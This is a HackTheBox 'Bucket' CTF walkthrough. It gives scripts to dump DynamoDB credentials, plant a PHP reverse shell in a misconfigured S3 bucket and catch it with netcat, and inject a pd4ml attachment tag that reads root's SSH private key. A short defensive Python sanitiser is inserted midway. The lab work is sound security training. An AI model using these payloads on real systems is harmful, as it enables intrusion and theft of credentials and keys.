Bucket HackTheBox WalkThrough


This is the Bucket HackTheBox machine walkthrough. In this writeup I demonstrate step by step how I rooted the Bucket HackTheBox machine. Before starting, here is something about the machine: it is a Linux box with IP address 10.10.10.212, rated Medium difficulty by its maker.

First of all, connect your PC to the HackTheBox VPN and confirm connectivity with the Bucket machine by pinging its IP 10.10.10.212. If all goes well, it is time to start. As usual, I began by scanning the machine. Scanning gives us an idea of how to proceed: it grabs the banners of the services running on the open ports and sometimes helps with vulnerability assessment as well. I used nmap for this task; the result is given below.

Scanning

$ sudo nmap -sC -sV -oN bucket.nmap 10.10.10.212

Performing nmap scan during Bucket Hackthebox walkthrough

Nmap revealed ports 22 and 80 as open: OpenSSH on port 22 and an Apache2 web server on port 80. Since Apache2 is listening on port 80, there should be a website at http://10.10.10.212. Visiting this URL redirects to http://bucket.htb, so before any further enumeration we have to add an entry mapping bucket.htb to 10.10.10.212 in our hosts file, which is located in /etc/. I added this record to my hosts file.

Host File After Modification

$ cat /etc/hosts

Host file after modification 1

On going to http://bucket.htb I found the heading Bucket Advertising Platform and an email address [email protected]. The email address is of no use here because ports 25, 110 and 143 are not open.

Bucket hackthebox webserver Web page

Checking the page source of this page revealed a new subdomain, s3.bucket.htb. Before going further I added this subdomain to my hosts file as well.

S3 subdomain exposed via Page source during Bucket Hackthebox walkthrough

Host File after Modification

$ cat /etc/hosts

Host file after modification 2

Going to http://s3.bucket.htb returned {Status: running}, so something is running there. Since the subdomain is s3 and the box is named Bucket, it must be an AWS (Amazon Web Services) S3 bucket. Although we now know it is an S3 bucket, we have nothing else to enumerate, so nothing is left except directory bruteforcing and fuzzing.

Directory Bruteforcing

$ sudo dirsearch -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://s3.bucket.htb/ -t 50 -e all | tee raft-medium.out

Performing directory bruteforcing on s3.bucket.htb during Bucket Hackthebox walkthrough

Directory bruteforcing found a folder named shell. Going to http://s3.bucket.htb/shell/ shows a DynamoDB JavaScript Shell. After some googling I found a way to enumerate the contents of the table users from this shell (see this link at StackOverflow). Simply paste the following code into the editor and click Run to execute it; you will get the details of all items in the table users.

var dynamodb = new AWS.DynamoDB({region: 'us-east-1', endpoint: "http://s3.bucket.htb"});
var tableName = "users";
var params = {TableName: tableName, Select: "ALL_ATTRIBUTES"};

function doScan(response) {
    if (response.error) ppJson(response.error); // an error occurred
    else {
        ppJson(response.data); // successful response
        // More data. Keep calling scan until LastEvaluatedKey is absent.
        if ('LastEvaluatedKey' in response.data) {
            response.request.params.ExclusiveStartKey = response.data.LastEvaluatedKey;
            dynamodb.scan(response.request.params)
                .on('complete', doScan)
                .send();
        }
    }
}

console.log("Starting a Scan of the table");
dynamodb.scan(params).on('complete', doScan).send();
DynamoDB webshell page

From the above output we found credentials: Mgmt: Management@#1@#, Cloudadm: Welcome123!, Sysadm: n2vM-<_K_Q:.Aa2

I did not know which of these, if any, were valid SSH credentials. I tried SSH with each of them one by one and even tested all the combinations with hydra (an online brute forcer), but no valid SSH credential was found. So our enumerated credentials are useless for now. Anyway, I added them to my CherryTree notes; they may be useful at some other point during further enumeration.

After some further enumeration I found a way to list the web server and its files stored inside the bucket using the awscli command line tool. To use awscli we first have to configure it with AWS credentials: AWS Access Key ID, AWS Secret Access Key, Default region name and Default output format (to install awscli use $ sudo apt install awscli). Here the S3 bucket is misconfigured: anyone, with any fake credentials, can access the web server content stored in this S3 bucket.

Using fake credentials I was able to access the web server content in this bucket. I could even upload a reverse shell to this web server and execute it to get a connection back to my machine.

To get a reverse shell, do the following.

1. Configure awscli for first use with fake credentials. For more info check this article at Amazon.

Accessing AWS Bucket Through Aws CLI

$ aws configure

AWS Access Key ID: AKIAI44QH8DHBEXAMPLE

AWS Secret Access Key: je7MtGbClwBF/2Zp9Utk/h3yCo8nvbEXAMPLEKEY

Default region name: us-east-1

Default output format: text

2. List the contents of the S3 bucket at http://s3.bucket.htb.

$ aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request

A bucket named adserver is listed; it holds the files of the adserver web server running at s3.bucket.htb.

3. List the contents of the adserver bucket.

$ aws s3 ls --recursive --human-readable s3://adserver --endpoint-url http://s3.bucket.htb/

4. Copy your php-reverse-shell script into the images folder using the aws s3 cp command (don't forget to change the IP address in the php-reverse-shell script to your tun0 IP; the PHP shell can be found on Kali in /usr/share/webshells/php/).

$ aws s3 cp ~/HTB/Boxes/Bucket/shell.php s3://adserver/images/shell.php --endpoint-url http://s3.bucket.htb/

5. List the files in the images folder to confirm whether our reverse shell was uploaded to the adserver bucket.

$ aws s3 ls s3://adserver/images/ --endpoint-url http://s3.bucket.htb/

6. Start a netcat listener on your Kali machine.

$ nc -nvlp 1234

7. Execute the shell.

$ curl --write-out "%{http_code}\n" --silent --output /dev/null http://s3.bucket.htb/adserver/images/shell.php

There is probably a cron job that deletes the shell as soon as we upload it. So I created a script that does this job very fast; you can get a shell using the script below.

Note: You may need to run this script 2 to 3 times to get a shell. Before running it, start your netcat listener on the port you specified in your shell script.

#!/bin/bash
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

echo "List Files."
aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver

## Copying file from local computer to Bucket
aws --endpoint-url http://s3.bucket.htb/ s3 cp shell.php s3://adserver/images/shell.php

echo "Checking if file is uploaded"
aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver

# Checking if file exists on web server
echo "Checking on s3.bucket"
curl --write-out "%{http_code}\n" --silent --output /dev/null http://s3.bucket.htb/adserver/images/shell.php

resp=404
# Requesting the shell repeatedly until we get response code 200
while [[ $resp -eq 404 ]]; do
    resp=$(curl --write-out "%{http_code}\n" --silent --output /dev/null http://bucket.htb/images/shell.php)
    echo $resp
    sleep 0.1;
done

$ bash exploit.sh

Getting user shell during bucket htb walkthrough

We have a user shell as www-data. Let us upgrade it to a fully interactive Linux shell so that we can run more advanced Linux commands through it.

Upgrading Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm

$ ^Z # CTRL+Z To background the shell

$ stty raw -echo

$ fg # Plus two times enter to foreground the shell

$ stty rows 38 columns 116

Upgrading shell to fully interactive Linux shell during bucket hackthebox writeup

We have the three credentials enumerated earlier. Let us try to switch to user roy with each of them one by one: roy: n2vM-<_K_Q:.Aa2 is the valid one. So let us switch to roy. This is also a valid SSH credential; in case you lose your shell, use it to get back in over SSH.

Switching to User Roy

$ su roy

Password: n2vM-<_K_Q:.Aa2

$ whoami

switching to user roy

Capture User Flag

$ cd ~

$ cat user.txt

Capturing user flag in bucket hackthebox walkthrough

Privilege Escalation

To escalate privilege to root we first have to find a privilege escalation vector. For this I ran linpeas.sh (a post-exploitation enumeration script) on the Bucket machine. It collects information on all the potential PrivEsc vectors that could be used to escalate privilege to root.

Finding PrivEsc Vector

Linpeas flagged the directory /var/www/bucket-app/aws/ as something suspicious that might be used to escalate privilege. I didn't know exactly why linpeas suspected it to be our potential PrivEsc vector. Let us check it manually and confirm whether we can get root using it.

Linpeas.sh snippet captured during Bucket Hackthebox walkthrough

The index.php file inside /var/www/bucket-app/ gave some information about a table alerts and an internal port, 4566, used as an endpoint. Since bucket-app is placed inside the public folder and Apache2 is running, there may be an internal web server running on this port. We will confirm it with the netstat command.

Index.php file inside bucket-app folder

$ netstat -punta

Netstat revealed some unusual ports, 4566 & 8000, listening locally.

Netstat results for listening port in bucket htb box

To access the services on these ports we have to forward them to our local machine so that we can open them in a web browser. We have the SSH credential of user roy (roy : n2vM-<_K_Q:.Aa2), so we can use SSH local port forwarding to reach these services from our machine. Let us perform local port forwarding.

Performing Local Port Forwarding

$ ssh -L 8000:127.0.0.1:8000 -L 4566:127.0.0.1:4566 [email protected]

Password: n2vM-<_K_Q:.Aa2

$ ss -lnpt # Check for listening port on your local machine

Performing local port forwarding

We have successfully forwarded the ports to our Kali machine, as confirmed by the $ ss -lnpt command on the Kali machine. Now we can check the services running on ports 8000 and 4566 in a web browser by visiting http://127.0.0.1:8000/ and http://127.0.0.1:4566.

An "Under construction" page is shown at http://127.0.0.1:8000.

Site under construction page at port 8000

A running status is shown at http://127.0.0.1:4566. Let us check the file index.php at /var/www/bucket-app/ again for more information.

Index.php file inside bucket-app folder

According to this file, it handles a POST request after accepting some data from the table alerts. It also expects some additional values: Ransomware, get_alerts and a file in the POST data. We will exploit this feature to get the private SSH key of the root user. For more info about how this page works you can check this article.

So, to exploit this feature and get the root user's private key, I did the following.

1. Created a new DynamoDB table alerts.

2. Inserted the requested values, along with our payload, into the table alerts.

3. Finally, made a POST request with the additional data requested.

I created a script to perform this job. Copy the script into a file, save it with the .sh extension and execute it.

#!/bin/bash
echo "Creating New Table"
echo "======================================"
# Creating New Table alerts
aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://127.0.0.1:4566

echo "======================================"
echo "Writing Data to alerts and putting in the file attacked.txt"
# Writing Data to table alerts
aws dynamodb put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/.ssh/id_rsa</pd4ml:attachment>"}}' --endpoint-url http://127.0.0.1:4566

echo "======================================"
echo "Making Post Requests"
# Making Post Request with data "action=get_alerts"
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/index.php
echo "Done"
echo "Go to http://127.0.0.1:8000/files/ and download the attachment"

$ bash command.sh

Running the command.sh script to create alerts table and inserting payload inside it during Bucket Hackthebox walkthrough
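The root-key step works because the application passes the alert's data field to the PDF renderer as markup, so a <pd4ml:attachment> tag pointing at file:///root/.ssh/id_rsa is honoured. The following is an added example, not the box's index.php (which is PHP) nor any project code, showing in Python how the application side could refuse or neutralise such an item before rendering; the item shapes are constructed to match the put-item call above, and the function names are my own.

```python
import re
from html import escape

# Constructed sample items in the shape the walkthrough's put-item call uses
# (DynamoDB JSON: each attribute wrapped in a type descriptor such as {"S": ...}).
BENIGN_ITEM = {"title": {"S": "Ransomware"},
               "data": {"S": "Three hosts in finance report encrypted shares."}}
MALICIOUS_ITEM = {"title": {"S": "Ransomware"},
                  "data": {"S": '<pd4ml:attachment description="attached.txt" icon="PushPin">'
                                'file:///root/.ssh/id_rsa</pd4ml:attachment>'}}

# Markup the PDF renderer interprets: any pd4ml: tag, or a local file reference.
PD4ML_TAG = re.compile(r"<\s*/?\s*pd4ml:[^>]*>", re.IGNORECASE)
LOCAL_FILE_REF = re.compile(r"\bfile:///", re.IGNORECASE)


def unwrap(attr):
    """Pull the string out of a DynamoDB 'S' attribute; any other shape is rejected."""
    if not isinstance(attr, dict) or set(attr) != {"S"} or not isinstance(attr["S"], str):
        raise ValueError("expected a DynamoDB string attribute")
    return attr["S"]


def find_issues(item):
    """Return the reasons an alert item must not be rendered as-is (empty if clean)."""
    issues = []
    data = unwrap(item["data"])
    if PD4ML_TAG.search(data):
        issues.append("pd4ml markup in alert data")
    if LOCAL_FILE_REF.search(data):
        issues.append("local file reference in alert data")
    return issues


def render_alert_html(item):
    """Build the fragment handed to the renderer, treating alert data as text, not markup."""
    title = escape(unwrap(item["title"]))
    data = escape(unwrap(item["data"]))
    return f"<h2>{title}</h2><p>{data}</p>"


def prepare_alerts(items):
    """Split a scan result into render-safe fragments and rejected items with their reasons."""
    rendered, rejected = [], []
    for item in items:
        issues = find_issues(item)
        if issues:
            rejected.append((unwrap(item["title"]), issues))  # log/alert on these
        else:
            rendered.append(render_alert_html(item))
    return rendered, rejected
```

Rejected items are worth logging as a detection signal in their own right, since a pd4ml tag or a file:/// URI has no business in an alert written by the advertising platform itself.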

Let us go to http://127.0.0.1:8000/files/result.pdf and download the attachment by clicking on the pin icon.

Downloading id_rsa script

The attachment is the id_rsa key of the root user.

$ cat ~/Downloads/id_rsa

id_rsa file of root user captured during Bucket Hackthebox walkthrough

Let us use this SSH private key to log in as root on the Bucket machine.

Getting Root Shell

$ cp ~/Downloads/id_rsa .

$ chmod 400 id_rsa

$ ssh -i id_rsa [email protected]

# whoami && id

Getting root shell during Bucket Hackthebox walkthrough

We are root now; let us capture the root flag.

Capture Root Flag

# cat root.txt

Capturing root flag

This was how I rooted the Bucket HackTheBox machine. I learnt a lot during this challenge and hope you have learnt something new too. Thanks for reading this walkthrough. Share your experience in the comment section. For any query or suggestion about the writeup feel free to write to us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/.


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec Consultant by day and a Bug Bounty Hunter & CTF player by night. I sometimes write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/